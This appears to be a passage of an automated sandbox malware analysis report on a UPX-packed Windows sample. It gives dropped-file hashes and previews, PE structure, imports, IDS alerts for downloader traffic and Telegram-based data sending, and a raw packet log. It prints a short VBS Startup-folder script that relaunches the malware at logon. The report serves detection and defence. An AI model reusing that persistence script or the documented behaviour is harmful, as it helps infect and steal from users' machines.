                                                                                                                Preview:EA06......3ZT.kE..i..V..E.Ti...Z.H.Pf...r...Uj.J-.._3@..i......X..'...my.\.2I...4..f...b./.....^. ...3{..Ue.G.....Q-.S'.8...g.N...>.R.S..*.D..`.ie..(.......)..,.....8.......$.N..Y...D.L.Qy...F...5.|..%.N.(~=.+.3..`0...5M.M&..M...Z...<.S:.Z..6........aj....kI....zef.......j..Y....z5N.X......J.....H.^+..]....H..&.............iI...}..^......m5..g...C=......6.4..... ...]...W....I..T.J...D.L..".Y..W.....j...(.\2pP.r.F.....r....E(.\5.{+..@....7..j3Ze^.T.Yh..?...5..+}......z!`.......C..M+_Y..m...+u..R]D.k.U.,^...c.8_......2....B........r.3y...2.Bw.-..s...?9....e....O.l.p..a.ZO.}..x1........*...#9...|...-O.Dw.ZN.B..).mV..J.H)...M4._..a...G.}..P......4..H......;a... ...;..Qh...*...C".......:z.b;D..@E.v.gc...6..u\..+.Z.......u\.'...Sc;L0....Z.._LG....f.....@.Mk.../K..h..y.....m-sy...@.....3....>q+EniD....^6.i9..e....II.\nV...q...t./.U..h .%?......ru..zhT*3...hy..[....6.{..@.TP..1k.Yv|...K..u.U9.2A]..q.mv.Ov..-..v......{.......7J.bk..o./..:.....^.G.

                                                                                                                C:\Users\user\AppData\Local\Temp\autD602.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):204300
                                                                                                                Entropy (8bit):7.983648426421018
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:XDoBs5PIZZdFf6eroXU98Ejv2NyOz87aY7V3fO71:UQid4eKHdzsayV3WR
                                                                                                                MD5:8601E5F7ABAC6B6BC82A2213E6F59E29
                                                                                                                SHA1:525713BA114CCC73C2240B72681F61D3387C9835
                                                                                                                SHA-256:AA787C91EFB2F3737A96A7A95D40D1C639D3C1F50D82FD489596F0945D240C5B
                                                                                                                SHA-512:3EEB7B4121D158825155986AFD3B1FAA9DB293636CF6EAAE46DDFAFD7C8448B1D93D3AC7167DB1311954E75867CBFF9753D85755F6B571DC37C9F2758C96840A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06......3ZT.kE..i..V..E.Ti...Z.H.Pf...r...Uj.J-.._3@..i......X..'...my.\.2I...4..f...b./.....^. ...3{..Ue.G.....Q-.S'.8...g.N...>.R.S..*.D..`.ie..(.......)..,.....8.......$.N..Y...D.L.Qy...F...5.|..%.N.(~=.+.3..`0...5M.M&..M...Z...<.S:.Z..6........aj....kI....zef.......j..Y....z5N.X......J.....H.^+..]....H..&.............iI...}..^......m5..g...C=......6.4..... ...]...W....I..T.J...D.L..".Y..W.....j...(.\2pP.r.F.....r....E(.\5.{+..@....7..j3Ze^.T.Yh..?...5..+}......z!`.......C..M+_Y..m...+u..R]D.k.U.,^...c.8_......2....B........r.3y...2.Bw.-..s...?9....e....O.l.p..a.ZO.}..x1........*...#9...|...-O.Dw.ZN.B..).mV..J.H)...M4._..a...G.}..P......4..H......;a... ...;..Qh...*...C".......:z.b;D..@E.v.gc...6..u\..+.Z.......u\.'...Sc;L0....Z.._LG....f.....@.Mk.../K..h..y.....m-sy...@.....3....>q+EniD....^6.i9..e....II.\nV...q...t./.U..h .%?......ru..zhT*3...hy..[....6.{..@.TP..1k.Yv|...K..u.U9.2A]..q.mv.Ov..-..v......{.......7J.bk..o./..:.....^.G.

                                                                                                                C:\Users\user\AppData\Local\Temp\slashing

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):208384
                                                                                                                Entropy (8bit):7.838019958242408
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:04cY976eOxWDNd2svYaQ/yCnhxPvjkoxRiI5nwNXRTVOQ9GVKrqpsECeXD82ssZg:x9nOxeRVwZbiOcZ9GVlaiXwl60F
                                                                                                                MD5:B87813394D89C367C3454AE8D8F014D3
                                                                                                                SHA1:32B98A0058C96BFD5919C716124B5A0B8756C9A4
                                                                                                                SHA-256:3F66E8474DF26704D3C490E822E9384D4BEB872D540D6D5EB4579064AF5A8440
                                                                                                                SHA-512:69236C230E0A7B58B845C918A08D92252B7E98DB16EB54151753F06F215253860F34E2F4CF4C340B60318AD15C24F68E3181278238C525F0FE3BB1F7FC29813B
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.n.5J75EW5LY..DE.QOX5VLHtA5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUT.EFQAG.XL.=...6y.ra$0&t47)6=9Xv/)Z/Z=.W sG97u=*e...xX9(-.L8C.5ES5LYU<T.k}>.Kz=.JmD.I.f,Ks(.*O../d).(`9.?i8.Kwp[2E$.:we81.D.2z.:KdF.;.\/1y%.;FQOX5VLH4A5I75ES...3TDEF..X5.ML45.Ig5ES5LYUT.EePDY<VL.5A5.65ES5Lv.TDEVQOX.WLH4.5I'5ES7LYPTDEFQOX0VLH4A5I7EFS5HYU..GFSOX.VLX4A%I75EC5LIUTDEFQ_X5VLH4A5I75.F7L.UTDE&SO.9WLH4A5I75ES5LYUTDEFQOX5VLH..4I+5ES5LYUTDEFQOX5VLH4A5I75ES5.TWT.EFQOX5VLH4A5.65.R5LYUTDEFQOX5VLH4A5I75ES5LY{ !=2QOX-.MH4Q5I7.DS5HYUTDEFQOX5VLH4a5IW.77T88UT.(FQO.4VL&4A5.65ES5LYUTDEFQO.5V.fP A(75E..LYUtFEFGOX5\NH4A5I75ES5LYU.DE..=+G5LH4.9H75%Q5LWTTDeDQOX5VLH4A5I75.S5.YUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5LYUTDEFQOX5VLH4A5I75ES5L

                                                                                                                C:\Users\user\AppData\Local\inhumate\demonetised.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\B7N48hmO78.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Category:dropped
                                                                                                                Size (bytes):649216
                                                                                                                Entropy (8bit):7.943126339759557
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx
                                                                                                                MD5:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                SHA1:F491FC184D0F15D789E81577E47446478C10ED53
                                                                                                                SHA-256:3FC9AFA49FA31F495A7792C38B6087609438625EC5073383483D7D1411C7CEC8
                                                                                                                SHA-512:F2604FC98D1ED6959B4A42EF442CAC15919EBB1B26F7516FA0CA782C639D035C7F5C0F599511E87246338A959BE4E5104FF98E3DF4BB7AB78B50389784E83432
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                • Antivirus: Virustotal, Detection: 73%, Browse
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...B.Gg.........."......P.........../.......@....@.......................................@...@.......@.........................$....@..............................................................t1..H...........................................UPX0....................................UPX1.....P.......B..................@....rsrc........@.......F..............@......................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):282
                                                                                                                Entropy (8bit):3.4138021730875194
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1MlxkRIwmUHA6nriIM8lfQVn:DsO+vNlzQ1MlCRILUg4mA2n
                                                                                                                MD5:33D15533EB9FBA37FE4AFE3DFD4F342B
                                                                                                                SHA1:7D4EF44BBDD42BE378956219BF8BF0B04450B50F
                                                                                                                SHA-256:D573ADF05AC57C88278EB3C79A5994BCF578DCD61D901C3089E6763ED42A2AC6
                                                                                                                SHA-512:7CC5B032CDF08A90DCBC5B6A5AD4C1DFC73F021825B86A4599AA1A82333F3D2A7E7BA5DCB8D1EBD672DFDD32BE4AB97BF79FD3F7B10CDDF99143BC90AD859CBB
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.i.n.h.u.m.a.t.e.\.d.e.m.o.n.e.t.i.s.e.d...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Entropy (8bit):7.943126339759557
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                File name:B7N48hmO78.exe
                                                                                                                File size:649'216 bytes
                                                                                                                MD5:80a64f0b8df55d637e135f0eb4fb6b70
                                                                                                                SHA1:f491fc184d0f15d789e81577e47446478c10ed53
                                                                                                                SHA256:3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8
                                                                                                                SHA512:f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432
                                                                                                                SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx
                                                                                                                TLSH:2CD423A0E9C8CC72EA413732817ECF905565B932ED466B1A5BD4E34E7473243A483F6E
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                                File Icon

                                                                                                                Icon Hash:aaf3e3e3938382a0

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x522f90
                                                                                                                Entrypoint Section:UPX1
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x67471042 [Wed Nov 27 12:27:46 2024 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:1
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:1
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:1
                                                                                                                Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                pushad
                                                                                                                mov esi, 004CF000h
                                                                                                                lea edi, dword ptr [esi-000CE000h]
                                                                                                                push edi
                                                                                                                jmp 00007F4E312BFC1Dh
                                                                                                                nop
                                                                                                                mov al, byte ptr [esi]
                                                                                                                inc esi
                                                                                                                mov byte ptr [edi], al
                                                                                                                inc edi
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                jc 00007F4E312BFBFFh
                                                                                                                mov eax, 00000001h
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                adc eax, eax
                                                                                                                add ebx, ebx
                                                                                                                jnc 00007F4E312BFC1Dh
                                                                                                                jne 00007F4E312BFC3Ah
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                jc 00007F4E312BFC31h
                                                                                                                dec eax
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                adc eax, eax
                                                                                                                jmp 00007F4E312BFBE6h
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                adc ecx, ecx
                                                                                                                jmp 00007F4E312BFC64h
                                                                                                                xor ecx, ecx
                                                                                                                sub eax, 03h
                                                                                                                jc 00007F4E312BFC23h
                                                                                                                shl eax, 08h
                                                                                                                mov al, byte ptr [esi]
                                                                                                                inc esi
                                                                                                                xor eax, FFFFFFFFh
                                                                                                                je 00007F4E312BFC87h
                                                                                                                sar eax, 1
                                                                                                                mov ebp, eax
                                                                                                                jmp 00007F4E312BFC1Dh
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                jc 00007F4E312BFBDEh
                                                                                                                inc ecx
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                jc 00007F4E312BFBD0h
                                                                                                                add ebx, ebx
                                                                                                                jne 00007F4E312BFC19h
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                adc ecx, ecx
                                                                                                                add ebx, ebx
                                                                                                                jnc 00007F4E312BFC01h
                                                                                                                jne 00007F4E312BFC1Bh
                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                sub esi, FFFFFFFCh
                                                                                                                adc ebx, ebx
                                                                                                                jnc 00007F4E312BFBF6h
                                                                                                                add ecx, 02h
                                                                                                                cmp ebp, FFFFFB00h
                                                                                                                adc ecx, 02h
                                                                                                                lea edx, dword ptr [edi+ebp]
                                                                                                                cmp ebp, FFFFFFFCh
                                                                                                                jbe 00007F4E312BFC20h
                                                                                                                mov al, byte ptr [edx]

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                • [ASM] VS2012 UPD4 build 61030
                                                                                                                • [RES] VS2012 UPD4 build 61030
                                                                                                                • [LNK] VS2012 UPD4 build 61030

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x16ddbc0x424.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1240000x49dbc.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x16e1e00x18.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1231740x48UPX1
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                UPX00x10000xce0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                UPX10xcf0000x550000x542007611cb89c40f2c739b956cb6edf01804False0.9888500650074294data7.937075263024194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x1240000x4b0000x4a20015d57d0eb0f4ac6de1a033e757b0bf89False0.9318382430438449data7.906003791272813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0x1245ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                RT_ICON0x1246d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                RT_ICON0x1248040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                RT_ICON0x1249300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                RT_ICON0x124c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                RT_ICON0x124d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                RT_ICON0x125bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                RT_ICON0x1264a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                RT_ICON0x126a0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                RT_ICON0x128fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                RT_ICON0x12a0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                RT_MENU0xca4a00x50emptyEnglishGreat Britain0
                                                                                                                RT_STRING0xca4f00x594emptyEnglishGreat Britain0
                                                                                                                RT_STRING0xcaa840x68aemptyEnglishGreat Britain0
                                                                                                                RT_STRING0xcb1100x490emptyEnglishGreat Britain0
                                                                                                                RT_STRING0xcb5a00x5fcemptyEnglishGreat Britain0
                                                                                                                RT_STRING0xcbb9c0x65cemptyEnglishGreat Britain0
                                                                                                                RT_STRING0xcc1f80x466emptyEnglishGreat Britain0
                                                                                                                RT_STRING0xcc6600x158emptyEnglishGreat Britain0
                                                                                                                RT_RCDATA0x12a4d00x43391data1.0003304944705733
                                                                                                                RT_GROUP_ICON0x16d8680x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                RT_GROUP_ICON0x16d8e40x14dataEnglishGreat Britain1.25
                                                                                                                RT_GROUP_ICON0x16d8fc0x14dataEnglishGreat Britain1.15
                                                                                                                RT_GROUP_ICON0x16d9140x14dataEnglishGreat Britain1.25
                                                                                                                RT_VERSION0x16d92c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                RT_MANIFEST0x16da0c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                                                                ADVAPI32.dllAddAce
                                                                                                                COMCTL32.dllImageList_Remove
                                                                                                                COMDLG32.dllGetSaveFileNameW
                                                                                                                GDI32.dllLineTo
                                                                                                                IPHLPAPI.DLLIcmpSendEcho
                                                                                                                MPR.dllWNetUseConnectionW
                                                                                                                ole32.dllCoGetObject
                                                                                                                OLEAUT32.dllVariantInit
                                                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                                                SHELL32.dllDragFinish
                                                                                                                USER32.dllGetDC
                                                                                                                USERENV.dllLoadUserProfileW
                                                                                                                UxTheme.dllIsThemeActive
                                                                                                                VERSION.dllVerQueryValueW
                                                                                                                WININET.dllFtpOpenFileW
                                                                                                                WINMM.dlltimeGetTime
                                                                                                                WSOCK32.dllsocket

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishGreat Britain

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2025-01-10T15:33:42.225455+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.247.7380TCP
                                                                                                                2025-01-10T15:33:43.772377+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704132.226.247.7380TCP
                                                                                                                2025-01-10T15:33:44.402670+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706104.21.32.1443TCP
                                                                                                                2025-01-10T15:33:45.147400+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707132.226.247.7380TCP
                                                                                                                2025-01-10T15:33:47.086336+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549710104.21.32.1443TCP
                                                                                                                2025-01-10T15:33:48.381258+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549712104.21.32.1443TCP
                                                                                                                2025-01-10T15:33:51.020949+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549716104.21.32.1443TCP
                                                                                                                2025-01-10T15:33:52.334346+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549718104.21.32.1443TCP
                                                                                                                2025-01-10T15:33:53.819335+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549720132.226.247.7380TCP
                                                                                                                2025-01-10T15:33:54.590569+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549722149.154.167.220443TCP
                                                                                                                2025-01-10T15:33:55.694292+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549720132.226.247.7380TCP
                                                                                                                2025-01-10T15:33:56.258742+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549732104.21.32.1443TCP
                                                                                                                2025-01-10T15:33:57.024547+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549739132.226.247.7380TCP
                                                                                                                2025-01-10T15:33:57.606888+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549744104.21.32.1443TCP
                                                                                                                2025-01-10T15:34:06.345035+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549812149.154.167.220443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 15:33:41.241233110 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:41.246082067 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:41.246191025 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:41.246402979 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:41.251147985 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:41.939254999 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:41.972153902 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:41.976999044 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:42.184575081 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:42.225455046 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:42.754292965 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:42.754328012 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:42.754396915 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:42.872644901 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:42.872667074 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.337281942 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.337388039 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.343194008 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.343199968 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.343502998 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.391086102 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.431329966 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.501516104 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.501594067 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.501758099 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.508687973 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.514060020 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:43.518948078 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.724380970 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.772377014 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:43.784329891 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.784360886 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.784429073 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.788748026 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.788765907 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.240334988 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.243097067 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:44.243128061 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.402683020 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.402743101 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.402797937 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:44.403182030 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:44.411228895 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.412297010 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.416172028 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.416241884 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.417083979 CET8049707132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.417154074 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.419333935 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.424108982 CET8049707132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.107078075 CET8049707132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.108534098 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.108582020 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.108997107 CET49708443192.168.2.5104.21.32.1
